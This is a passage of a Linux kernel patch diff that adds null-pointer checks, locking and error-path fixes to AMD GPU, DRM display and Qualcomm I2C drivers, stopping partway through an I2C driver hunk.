+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+index ee83d282b49a8..4b7b3278a05f1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+@@ -1679,12 +1679,15 @@ static void amdgpu_ras_interrupt_process_handler(struct work_struct *work)
+ int amdgpu_ras_interrupt_dispatch(struct amdgpu_device *adev,
+ 		struct ras_dispatch_if *info)
+ {
+-	struct ras_manager *obj = amdgpu_ras_find_obj(adev, &info->head);
+-	struct ras_ih_data *data = &obj->ih_data;
++	struct ras_manager *obj;
++	struct ras_ih_data *data;
+ 
++	obj = amdgpu_ras_find_obj(adev, &info->head);
+ 	if (!obj)
+ 		return -EINVAL;
+ 
++	data = &obj->ih_data;
++
+ 	if (data->inuse == 0)
+ 		return 0;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+index 81549f1edfe01..5ee9211c503c4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+@@ -956,6 +956,9 @@ static u32 amdgpu_virt_rlcg_reg_rw(struct amdgpu_device *adev, u32 offset, u32 v
+ 	scratch_reg1 = (void __iomem *)adev->rmmio + 4 * reg_access_ctrl->scratch_reg1;
+ 	scratch_reg2 = (void __iomem *)adev->rmmio + 4 * reg_access_ctrl->scratch_reg2;
+ 	scratch_reg3 = (void __iomem *)adev->rmmio + 4 * reg_access_ctrl->scratch_reg3;
++
++	mutex_lock(&adev->virt.rlcg_reg_lock);
++
+ 	if (reg_access_ctrl->spare_int)
+ 		spare_int = (void __iomem *)adev->rmmio + 4 * reg_access_ctrl->spare_int;
+ 
+@@ -1009,6 +1012,9 @@ static u32 amdgpu_virt_rlcg_reg_rw(struct amdgpu_device *adev, u32 offset, u32 v
+ 	}
+ 
+ 	ret = readl(scratch_reg0);
++
++	mutex_unlock(&adev->virt.rlcg_reg_lock);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+index 2b9d806e23afb..dc6aaa4d67be7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+@@ -260,6 +260,8 @@ struct amdgpu_virt {
+ 
+ 	/* the ucode id to signal the autoload */
+ 	uint32_t autoload_ucode_id;
++
++	struct mutex rlcg_reg_lock;
+ };
+ 
+ struct amdgpu_video_codec_info;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 31bae620aeffc..6189685af1fda 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2636,7 +2636,8 @@ static int dm_suspend(void *handle)
+ 
+ 		dm->cached_dc_state = dc_copy_state(dm->dc->current_state);
+ 
+-		dm_gpureset_toggle_interrupts(adev, dm->cached_dc_state, false);
++		if (dm->cached_dc_state)
++			dm_gpureset_toggle_interrupts(adev, dm->cached_dc_state, false);
+ 
+ 		amdgpu_dm_commit_zero_streams(dm->dc);
+ 
+@@ -6388,7 +6389,8 @@ static void create_eml_sink(struct amdgpu_dm_connector *aconnector)
+ 		aconnector->dc_sink = aconnector->dc_link->local_sink ?
+ 		aconnector->dc_link->local_sink :
+ 		aconnector->dc_em_sink;
+-		dc_sink_retain(aconnector->dc_sink);
++		if (aconnector->dc_sink)
++			dc_sink_retain(aconnector->dc_sink);
+ 	}
+ }
+ 
+@@ -7121,7 +7123,8 @@ static int amdgpu_dm_connector_get_modes(struct drm_connector *connector)
+ 				drm_add_modes_noedid(connector, 640, 480);
+ 	} else {
+ 		amdgpu_dm_connector_ddc_get_modes(connector, edid);
+-		amdgpu_dm_connector_add_common_modes(encoder, connector);
++		if (encoder)
++			amdgpu_dm_connector_add_common_modes(encoder, connector);
+ 		amdgpu_dm_connector_add_freesync_modes(connector, edid);
+ 	}
+ 	amdgpu_dm_fbc_init(connector);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index a9ddff774a978..b41a188007b8c 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -1255,6 +1255,9 @@ static bool is_dsc_need_re_compute(
+ 		}
+ 	}
+ 
++	if (new_stream_on_link_num == 0)
++		return false;
++
+ 	/* check current_state if there stream on link but it is not in
+ 	 * new request state
+ 	 */
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+index 179e1c593a53f..f3668911a88fd 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+@@ -928,7 +928,7 @@ static int pp_dpm_switch_power_profile(void *handle,
+ 		enum PP_SMC_POWER_PROFILE type, bool en)
+ {
+ 	struct pp_hwmgr *hwmgr = handle;
+-	long workload;
++	long workload[1];
+ 	uint32_t index;
+ 
+ 	if (!hwmgr || !hwmgr->pm_en)
+@@ -946,12 +946,12 @@ static int pp_dpm_switch_power_profile(void *handle,
+ 		hwmgr->workload_mask &= ~(1 << hwmgr->workload_prority[type]);
+ 		index = fls(hwmgr->workload_mask);
+ 		index = index > 0 && index <= Workload_Policy_Max ? index - 1 : 0;
+-		workload = hwmgr->workload_setting[index];
++		workload[0] = hwmgr->workload_setting[index];
+ 	} else {
+ 		hwmgr->workload_mask |= (1 << hwmgr->workload_prority[type]);
+ 		index = fls(hwmgr->workload_mask);
+ 		index = index <= Workload_Policy_Max ? index - 1 : 0;
+-		workload = hwmgr->workload_setting[index];
++		workload[0] = hwmgr->workload_setting[index];
+ 	}
+ 
+ 	if (type == PP_SMC_POWER_PROFILE_COMPUTE &&
+@@ -961,7 +961,7 @@ static int pp_dpm_switch_power_profile(void *handle,
+ 	}
+ 
+ 	if (hwmgr->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL)
+-		hwmgr->hwmgr_func->set_power_profile_mode(hwmgr, &workload, 0);
++		hwmgr->hwmgr_func->set_power_profile_mode(hwmgr, workload, 0);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+index 1d829402cd2e2..f4bd8e9357e22 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+@@ -269,7 +269,7 @@ int psm_adjust_power_state_dynamic(struct pp_hwmgr *hwmgr, bool skip_display_set
+ 						struct pp_power_state *new_ps)
+ {
+ 	uint32_t index;
+-	long workload;
++	long workload[1];
+ 
+ 	if (hwmgr->not_vf) {
+ 		if (!skip_display_settings)
+@@ -294,10 +294,10 @@ int psm_adjust_power_state_dynamic(struct pp_hwmgr *hwmgr, bool skip_display_set
+ 	if (hwmgr->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL) {
+ 		index = fls(hwmgr->workload_mask);
+ 		index = index > 0 && index <= Workload_Policy_Max ? index - 1 : 0;
+-		workload = hwmgr->workload_setting[index];
++		workload[0] = hwmgr->workload_setting[index];
+ 
+-		if (hwmgr->power_profile_mode != workload && hwmgr->hwmgr_func->set_power_profile_mode)
+-			hwmgr->hwmgr_func->set_power_profile_mode(hwmgr, &workload, 0);
++		if (hwmgr->power_profile_mode != workload[0] && hwmgr->hwmgr_func->set_power_profile_mode)
++			hwmgr->hwmgr_func->set_power_profile_mode(hwmgr, workload, 0);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+index 5e9410117712c..750b7527bdf83 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+@@ -2970,6 +2970,7 @@ static int smu7_update_edc_leakage_table(struct pp_hwmgr *hwmgr)
+ 
+ static int smu7_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ {
++	struct amdgpu_device *adev = hwmgr->adev;
+ 	struct smu7_hwmgr *data;
+ 	int result = 0;
+ 
+@@ -3006,40 +3007,37 @@ static int smu7_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 	/* Initalize Dynamic State Adjustment Rule Settings */
+ 	result = phm_initializa_dynamic_state_adjustment_rule_settings(hwmgr);
+ 
+-	if (0 == result) {
+-		struct amdgpu_device *adev = hwmgr->adev;
++	if (result)
++		goto fail;
+ 
+-		data->is_tlu_enabled = false;
++	data->is_tlu_enabled = false;
+ 
+-		hwmgr->platform_descriptor.hardwareActivityPerformanceLevels =
++	hwmgr->platform_descriptor.hardwareActivityPerformanceLevels =
+ 							SMU7_MAX_HARDWARE_POWERLEVELS;
+-		hwmgr->platform_descriptor.hardwarePerformanceLevels = 2;
+-		hwmgr->platform_descriptor.minimumClocksReductionPercentage = 50;
++	hwmgr->platform_descriptor.hardwarePerformanceLevels = 2;
++	hwmgr->platform_descriptor.minimumClocksReductionPercentage = 50;
+ 
+-		data->pcie_gen_cap = adev->pm.pcie_gen_mask;
+-		if (data->pcie_gen_cap & CAIL_PCIE_LINK_SPEED_SUPPORT_GEN3)
+-			data->pcie_spc_cap = 20;
+-		else
+-			data->pcie_spc_cap = 16;
+-		data->pcie_lane_cap = adev->pm.pcie_mlw_mask;
+-
+-		hwmgr->platform_descriptor.vbiosInterruptId = 0x20000400; /* IRQ_SOURCE1_SW_INT */
+-/* The true clock step depends on the frequency, typically 4.5 or 9 MHz. Here we use 5. */
+-		hwmgr->platform_descriptor.clockStep.engineClock = 500;
+-		hwmgr->platform_descriptor.clockStep.memoryClock = 500;
+-		smu7_thermal_parameter_init(hwmgr);
+-	} else {
+-		/* Ignore return value in here, we are cleaning up a mess. */
+-		smu7_hwmgr_backend_fini(hwmgr);
+-	}
++	data->pcie_gen_cap = adev->pm.pcie_gen_mask;
++	if (data->pcie_gen_cap & CAIL_PCIE_LINK_SPEED_SUPPORT_GEN3)
++		data->pcie_spc_cap = 20;
++	else
++		data->pcie_spc_cap = 16;
++	data->pcie_lane_cap = adev->pm.pcie_mlw_mask;
++
++	hwmgr->platform_descriptor.vbiosInterruptId = 0x20000400; /* IRQ_SOURCE1_SW_INT */
++	/* The true clock step depends on the frequency, typically 4.5 or 9 MHz. Here we use 5. */
++	hwmgr->platform_descriptor.clockStep.engineClock = 500;
++	hwmgr->platform_descriptor.clockStep.memoryClock = 500;
++	smu7_thermal_parameter_init(hwmgr);
+ 
+ 	result = smu7_update_edc_leakage_table(hwmgr);
+-	if (result) {
+-		smu7_hwmgr_backend_fini(hwmgr);
+-		return result;
+-	}
++	if (result)
++		goto fail;
+ 
+ 	return 0;
++fail:
++	smu7_hwmgr_backend_fini(hwmgr);
++	return result;
+ }
+ 
+ static int smu7_force_dpm_highest(struct pp_hwmgr *hwmgr)
+@@ -3329,8 +3327,7 @@ static int smu7_apply_state_adjust_rules(struct pp_hwmgr *hwmgr,
+ 			const struct pp_power_state *current_ps)
+ {
+ 	struct amdgpu_device *adev = hwmgr->adev;
+-	struct smu7_power_state *smu7_ps =
+-				cast_phw_smu7_power_state(&request_ps->hardware);
++	struct smu7_power_state *smu7_ps;
+ 	uint32_t sclk;
+ 	uint32_t mclk;
+ 	struct PP_Clocks minimum_clocks = {0};
+@@ -3347,6 +3344,10 @@ static int smu7_apply_state_adjust_rules(struct pp_hwmgr *hwmgr,
+ 	uint32_t latency;
+ 	bool latency_allowed = false;
+ 
++	smu7_ps = cast_phw_smu7_power_state(&request_ps->hardware);
++	if (!smu7_ps)
++		return -EINVAL;
++
+ 	data->battery_state = (PP_StateUILabel_Battery ==
+ 			request_ps->classification.ui_label);
+ 	data->mclk_ignore_signal = false;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+index b015a601b385a..eb744401e0567 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+@@ -1065,16 +1065,18 @@ static int smu8_apply_state_adjust_rules(struct pp_hwmgr *hwmgr,
+ 				struct pp_power_state  *prequest_ps,
+ 			const struct pp_power_state *pcurrent_ps)
+ {
+-	struct smu8_power_state *smu8_ps =
+-				cast_smu8_power_state(&prequest_ps->hardware);
+-
+-	const struct smu8_power_state *smu8_current_ps =
+-				cast_const_smu8_power_state(&pcurrent_ps->hardware);
+-
++	struct smu8_power_state *smu8_ps;
++	const struct smu8_power_state *smu8_current_ps;
+ 	struct smu8_hwmgr *data = hwmgr->backend;
+ 	struct PP_Clocks clocks = {0, 0, 0, 0};
+ 	bool force_high;
+ 
++	smu8_ps = cast_smu8_power_state(&prequest_ps->hardware);
++	smu8_current_ps = cast_const_smu8_power_state(&pcurrent_ps->hardware);
++
++	if (!smu8_ps || !smu8_current_ps)
++		return -EINVAL;
++
+ 	smu8_ps->need_dfs_bypass = true;
+ 
+ 	data->battery_state = (PP_StateUILabel_Battery == prequest_ps->classification.ui_label);
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+index d8cd23438b762..f8333410cc3e4 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+@@ -3263,8 +3263,7 @@ static int vega10_apply_state_adjust_rules(struct pp_hwmgr *hwmgr,
+ 			const struct pp_power_state *current_ps)
+ {
+ 	struct amdgpu_device *adev = hwmgr->adev;
+-	struct vega10_power_state *vega10_ps =
+-				cast_phw_vega10_power_state(&request_ps->hardware);
++	struct vega10_power_state *vega10_ps;
+ 	uint32_t sclk;
+ 	uint32_t mclk;
+ 	struct PP_Clocks minimum_clocks = {0};
+@@ -3282,6 +3281,10 @@ static int vega10_apply_state_adjust_rules(struct pp_hwmgr *hwmgr,
+ 	uint32_t stable_pstate_sclk = 0, stable_pstate_mclk = 0;
+ 	uint32_t latency;
+ 
++	vega10_ps = cast_phw_vega10_power_state(&request_ps->hardware);
++	if (!vega10_ps)
++		return -EINVAL;
++
+ 	data->battery_state = (PP_StateUILabel_Battery ==
+ 			request_ps->classification.ui_label);
+ 
+@@ -3419,13 +3422,17 @@ static int vega10_find_dpm_states_clocks_in_dpm_table(struct pp_hwmgr *hwmgr, co
+ 	const struct vega10_power_state *vega10_ps =
+ 			cast_const_phw_vega10_power_state(states->pnew_state);
+ 	struct vega10_single_dpm_table *sclk_table = &(data->dpm_table.gfx_table);
+-	uint32_t sclk = vega10_ps->performance_levels
+-			[vega10_ps->performance_level_count - 1].gfx_clock;
+ 	struct vega10_single_dpm_table *mclk_table = &(data->dpm_table.mem_table);
+-	uint32_t mclk = vega10_ps->performance_levels
+-			[vega10_ps->performance_level_count - 1].mem_clock;
++	uint32_t sclk, mclk;
+ 	uint32_t i;
+ 
++	if (vega10_ps == NULL)
++		return -EINVAL;
++	sclk = vega10_ps->performance_levels
++			[vega10_ps->performance_level_count - 1].gfx_clock;
++	mclk = vega10_ps->performance_levels
++			[vega10_ps->performance_level_count - 1].mem_clock;
++
+ 	for (i = 0; i < sclk_table->count; i++) {
+ 		if (sclk == sclk_table->dpm_levels[i].value)
+ 			break;
+@@ -3732,6 +3739,9 @@ static int vega10_generate_dpm_level_enable_mask(
+ 			cast_const_phw_vega10_power_state(states->pnew_state);
+ 	int i;
+ 
++	if (vega10_ps == NULL)
++		return -EINVAL;
++
+ 	PP_ASSERT_WITH_CODE(!vega10_trim_dpm_states(hwmgr, vega10_ps),
+ 			"Attempt to Trim DPM States Failed!",
+ 			return -1);
+@@ -4999,6 +5009,8 @@ static int vega10_check_states_equal(struct pp_hwmgr *hwmgr,
+ 
+ 	vega10_psa = cast_const_phw_vega10_power_state(pstate1);
+ 	vega10_psb = cast_const_phw_vega10_power_state(pstate2);
++	if (vega10_psa == NULL || vega10_psb == NULL)
++		return -EINVAL;
+ 
+ 	/* If the two states don't even have the same number of performance levels
+ 	 * they cannot be the same state.
+@@ -5132,6 +5144,8 @@ static int vega10_set_sclk_od(struct pp_hwmgr *hwmgr, uint32_t value)
+ 		return -EINVAL;
+ 
+ 	vega10_ps = cast_phw_vega10_power_state(&ps->hardware);
++	if (vega10_ps == NULL)
++		return -EINVAL;
+ 
+ 	vega10_ps->performance_levels
+ 	[vega10_ps->performance_level_count - 1].gfx_clock =
+@@ -5183,6 +5197,8 @@ static int vega10_set_mclk_od(struct pp_hwmgr *hwmgr, uint32_t value)
+ 		return -EINVAL;
+ 
+ 	vega10_ps = cast_phw_vega10_power_state(&ps->hardware);
++	if (vega10_ps == NULL)
++		return -EINVAL;
+ 
+ 	vega10_ps->performance_levels
+ 	[vega10_ps->performance_level_count - 1].mem_clock =
+@@ -5424,6 +5440,9 @@ static void vega10_odn_update_power_state(struct pp_hwmgr *hwmgr)
+ 		return;
+ 
+ 	vega10_ps = cast_phw_vega10_power_state(&ps->hardware);
++	if (vega10_ps == NULL)
++		return;
++
+ 	max_level = vega10_ps->performance_level_count - 1;
+ 
+ 	if (vega10_ps->performance_levels[max_level].gfx_clock !=
+@@ -5446,6 +5465,9 @@ static void vega10_odn_update_power_state(struct pp_hwmgr *hwmgr)
+ 
+ 	ps = (struct pp_power_state *)((unsigned long)(hwmgr->ps) + hwmgr->ps_size * (hwmgr->num_ps - 1));
+ 	vega10_ps = cast_phw_vega10_power_state(&ps->hardware);
++	if (vega10_ps == NULL)
++		return;
++
+ 	max_level = vega10_ps->performance_level_count - 1;
+ 
+ 	if (vega10_ps->performance_levels[max_level].gfx_clock !=
+@@ -5636,6 +5658,8 @@ static int vega10_get_performance_level(struct pp_hwmgr *hwmgr, const struct pp_
+ 		return -EINVAL;
+ 
+ 	vega10_ps = cast_const_phw_vega10_power_state(state);
++	if (vega10_ps == NULL)
++		return -EINVAL;
+ 
+ 	i = index > vega10_ps->performance_level_count - 1 ?
+ 			vega10_ps->performance_level_count - 1 : index;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 1d0693dad8185..91f0646eb3ee0 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1834,7 +1834,7 @@ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+ {
+ 	int ret = 0;
+ 	int index = 0;
+-	long workload;
++	long workload[1];
+ 	struct smu_dpm_context *smu_dpm_ctx = &(smu->smu_dpm);
+ 
+ 	if (!skip_display_settings) {
+@@ -1874,10 +1874,10 @@ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+ 		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM) {
+ 		index = fls(smu->workload_mask);
+ 		index = index > 0 && index <= WORKLOAD_POLICY_MAX ? index - 1 : 0;
+-		workload = smu->workload_setting[index];
++		workload[0] = smu->workload_setting[index];
+ 
+-		if (smu->power_profile_mode != workload)
+-			smu_bump_power_profile_mode(smu, &workload, 0);
++		if (smu->power_profile_mode != workload[0])
++			smu_bump_power_profile_mode(smu, workload, 0);
+ 	}
+ 
+ 	return ret;
+@@ -1927,7 +1927,7 @@ static int smu_switch_power_profile(void *handle,
+ {
+ 	struct smu_context *smu = handle;
+ 	struct smu_dpm_context *smu_dpm_ctx = &(smu->smu_dpm);
+-	long workload;
++	long workload[1];
+ 	uint32_t index;
+ 
+ 	if (!smu->pm_enabled || !smu->adev->pm.dpm_enabled)
+@@ -1940,17 +1940,17 @@ static int smu_switch_power_profile(void *handle,
+ 		smu->workload_mask &= ~(1 << smu->workload_prority[type]);
+ 		index = fls(smu->workload_mask);
+ 		index = index > 0 && index <= WORKLOAD_POLICY_MAX ? index - 1 : 0;
+-		workload = smu->workload_setting[index];
++		workload[0] = smu->workload_setting[index];
+ 	} else {
+ 		smu->workload_mask |= (1 << smu->workload_prority[type]);
+ 		index = fls(smu->workload_mask);
+ 		index = index <= WORKLOAD_POLICY_MAX ? index - 1 : 0;
+-		workload = smu->workload_setting[index];
++		workload[0] = smu->workload_setting[index];
+ 	}
+ 
+ 	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL &&
+ 		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM)
+-		smu_bump_power_profile_mode(smu, &workload, 0);
++		smu_bump_power_profile_mode(smu, workload, 0);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/bridge/analogix/analogix_dp_reg.c b/drivers/gpu/drm/bridge/analogix/analogix_dp_reg.c
+index 6a4f20fccf841..7b0bc9704eacb 100644
+--- a/drivers/gpu/drm/bridge/analogix/analogix_dp_reg.c
++++ b/drivers/gpu/drm/bridge/analogix/analogix_dp_reg.c
+@@ -1027,7 +1027,6 @@ ssize_t analogix_dp_transfer(struct analogix_dp_device *dp,
+ 	u32 status_reg;
+ 	u8 *buffer = msg->buffer;
+ 	unsigned int i;
+-	int num_transferred = 0;
+ 	int ret;
+ 
+ 	/* Buffer size of AUX CH is 16 bytes */
+@@ -1079,7 +1078,6 @@ ssize_t analogix_dp_transfer(struct analogix_dp_device *dp,
+ 			reg = buffer[i];
+ 			writel(reg, dp->reg_base + ANALOGIX_DP_BUF_DATA_0 +
+ 			       4 * i);
+-			num_transferred++;
+ 		}
+ 	}
+ 
+@@ -1127,7 +1125,6 @@ ssize_t analogix_dp_transfer(struct analogix_dp_device *dp,
+ 			reg = readl(dp->reg_base + ANALOGIX_DP_BUF_DATA_0 +
+ 				    4 * i);
+ 			buffer[i] = (unsigned char)reg;
+-			num_transferred++;
+ 		}
+ 	}
+ 
+@@ -1144,7 +1141,7 @@ ssize_t analogix_dp_transfer(struct analogix_dp_device *dp,
+ 		 (msg->request & ~DP_AUX_I2C_MOT) == DP_AUX_NATIVE_READ)
+ 		msg->reply = DP_AUX_NATIVE_REPLY_ACK;
+ 
+-	return num_transferred > 0 ? num_transferred : -EBUSY;
++	return msg->size;
+ 
+ aux_error:
+ 	/* if aux err happen, reset aux */
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 805f8455b8d64..4204d1f930137 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -4024,6 +4024,7 @@ static int drm_dp_mst_handle_up_req(struct drm_dp_mst_topology_mgr *mgr)
+ 	if (up_req->msg.req_type == DP_CONNECTION_STATUS_NOTIFY) {
+ 		const struct drm_dp_connection_status_notify *conn_stat =
+ 			&up_req->msg.u.conn_stat;
++		bool handle_csn;
+ 
+ 		drm_dbg_kms(mgr->dev, "Got CSN: pn: %d ldps:%d ddps: %d mcs: %d ip: %d pdt: %d\n",
+ 			    conn_stat->port_number,
+@@ -4032,6 +4033,16 @@ static int drm_dp_mst_handle_up_req(struct drm_dp_mst_topology_mgr *mgr)
+ 			    conn_stat->message_capability_status,
+ 			    conn_stat->input_port,
+ 			    conn_stat->peer_device_type);
++
++		mutex_lock(&mgr->probe_lock);
++		handle_csn = mgr->mst_primary->link_address_sent;
++		mutex_unlock(&mgr->probe_lock);
++
++		if (!handle_csn) {
++			drm_dbg_kms(mgr->dev, "Got CSN before finish topology probing. Skip it.");
++			kfree(up_req);
++			goto out;
++		}
+ 	} else if (up_req->msg.req_type == DP_RESOURCE_STATUS_NOTIFY) {
+ 		const struct drm_dp_resource_status_notify *res_stat =
+ 			&up_req->msg.u.resource_stat;
+diff --git a/drivers/gpu/drm/drm_client_modeset.c b/drivers/gpu/drm/drm_client_modeset.c
+index 9a65806047b5e..718acff90e2d3 100644
+--- a/drivers/gpu/drm/drm_client_modeset.c
++++ b/drivers/gpu/drm/drm_client_modeset.c
+@@ -873,6 +873,11 @@ int drm_client_modeset_probe(struct drm_client_dev *client, unsigned int width,
+ 
+ 			kfree(modeset->mode);
+ 			modeset->mode = drm_mode_duplicate(dev, mode);
++			if (!modeset->mode) {
++				ret = -ENOMEM;
++				break;
++			}
++
+ 			drm_connector_get(connector);
+ 			modeset->connectors[modeset->num_connectors++] = connector;
+ 			modeset->x = offset->x;
+diff --git a/drivers/gpu/drm/lima/lima_drv.c b/drivers/gpu/drm/lima/lima_drv.c
+index 39cab4a55f572..53ac94bdf475a 100644
+--- a/drivers/gpu/drm/lima/lima_drv.c
++++ b/drivers/gpu/drm/lima/lima_drv.c
+@@ -489,3 +489,4 @@ module_platform_driver(lima_platform_driver);
+ MODULE_AUTHOR("Lima Project Developers");
+ MODULE_DESCRIPTION("Lima DRM Driver");
+ MODULE_LICENSE("GPL v2");
++MODULE_SOFTDEP("pre: governor_simpleondemand");
+diff --git a/drivers/gpu/drm/mgag200/mgag200_i2c.c b/drivers/gpu/drm/mgag200/mgag200_i2c.c
+index 0c48bdf3e7f80..f5c5d06d0d4bb 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_i2c.c
++++ b/drivers/gpu/drm/mgag200/mgag200_i2c.c
+@@ -31,6 +31,8 @@
+ #include <linux/i2c.h>
+ #include <linux/pci.h>
+ 
++#include <drm/drm_managed.h>
++
+ #include "mgag200_drv.h"
+ 
+ static int mga_i2c_read_gpio(struct mga_device *mdev)
+@@ -86,7 +88,7 @@ static int mga_gpio_getscl(void *data)
+ 	return (mga_i2c_read_gpio(mdev) & i2c->clock) ? 1 : 0;
+ }
+ 
+-static void mgag200_i2c_release(void *res)
++static void mgag200_i2c_release(struct drm_device *dev, void *res)
+ {
+ 	struct mga_i2c_chan *i2c = res;
+ 
+@@ -115,7 +117,7 @@ int mgag200_i2c_init(struct mga_device *mdev, struct mga_i2c_chan *i2c)
+ 	i2c->adapter.algo_data = &i2c->bit;
+ 
+ 	i2c->bit.udelay = 10;
+-	i2c->bit.timeout = 2;
++	i2c->bit.timeout = usecs_to_jiffies(2200);
+ 	i2c->bit.data = i2c;
+ 	i2c->bit.setsda		= mga_gpio_setsda;
+ 	i2c->bit.setscl		= mga_gpio_setscl;
+@@ -126,5 +128,5 @@ int mgag200_i2c_init(struct mga_device *mdev, struct mga_i2c_chan *i2c)
+ 	if (ret)
+ 		return ret;
+ 
+-	return devm_add_action_or_reset(dev->dev, mgag200_i2c_release, i2c);
++	return drmm_add_action_or_reset(dev, mgag200_i2c_release, i2c);
+ }
+diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
+index 75b9c3f26bba6..cc957655cec24 100644
+--- a/drivers/i2c/busses/i2c-qcom-geni.c
++++ b/drivers/i2c/busses/i2c-qcom-geni.c
+@@ -88,6 +88,7 @@ struct geni_i2c_dev {
+ 	int cur_wr;
+ 	int cur_rd;
+ 	spinlock_t lock;
++	struct clk *core_clk;
+ 	u32 clk_freq_out;
+ 	const struct geni_i2c_clk_fld *clk_fld;
+ 	int suspended;
+@@ -100,6 +101,13 @@ struct geni_i2c_dev {
+ 	bool abort_done;
+ };
+ 
++struct geni_i2c_desc {
++	bool has_core_clk;
++	char *icc_ddr;
++	bool no_dma_support;
++	unsigned int tx_fifo_depth;
++};
++
+ struct geni_i2c_err_log {
+ 	int err;
+ 	const char *msg;
+@@ -763,6 +771,7 @@ static int geni_i2c_probe(struct platform_device *pdev)
+ 	u32 proto, tx_depth, fifo_disable;
+ 	int ret;
+ 	struct device *dev = &pdev->dev;
++	const struct geni_i2c_desc *desc = NULL;
+ 
+ 	gi2c = devm_kzalloc(dev, sizeof(*gi2c), GFP_KERNEL);
+ 	if (!gi2c)
+@@ -775,6 +784,14 @@ static int geni_i2c_probe(struct platform_device *pdev)
+ 	if (IS_ERR(gi2c->se.base))
+ 		return PTR_ERR(gi2c->se.base);
+ 
++	desc = device_get_match_data(&pdev->dev);
++
++	if (desc && desc->has_core_clk) {
++		gi2c->core_clk = devm_clk_get(dev, "core");
++		if (IS_ERR(gi2c->core_clk))
++			return PTR_ERR(gi2c->core_clk);
++	}
++
+ 	gi2c->se.clk = devm_clk_get(dev, "se");
+ 	if (IS_ERR(gi2c->se.clk) && !has_acpi_companion(dev))
+ 		return PTR_ERR(gi2c->se.clk);
+@@ -818,7 +835,7 @@ static int geni_i2c_probe(struct platform_device *pdev)
+ 	gi2c->adap.dev.of_node = dev->of_node;
+ 	strscpy(gi2c->adap.name, "Geni-I2C", sizeof(gi2c->adap.name));
+ 
+-	ret = geni_icc_get(&gi2c->se, "qup-memory");
++	ret = geni_icc_get(&gi2c->se, desc ? desc->icc_ddr : "qup-memory");
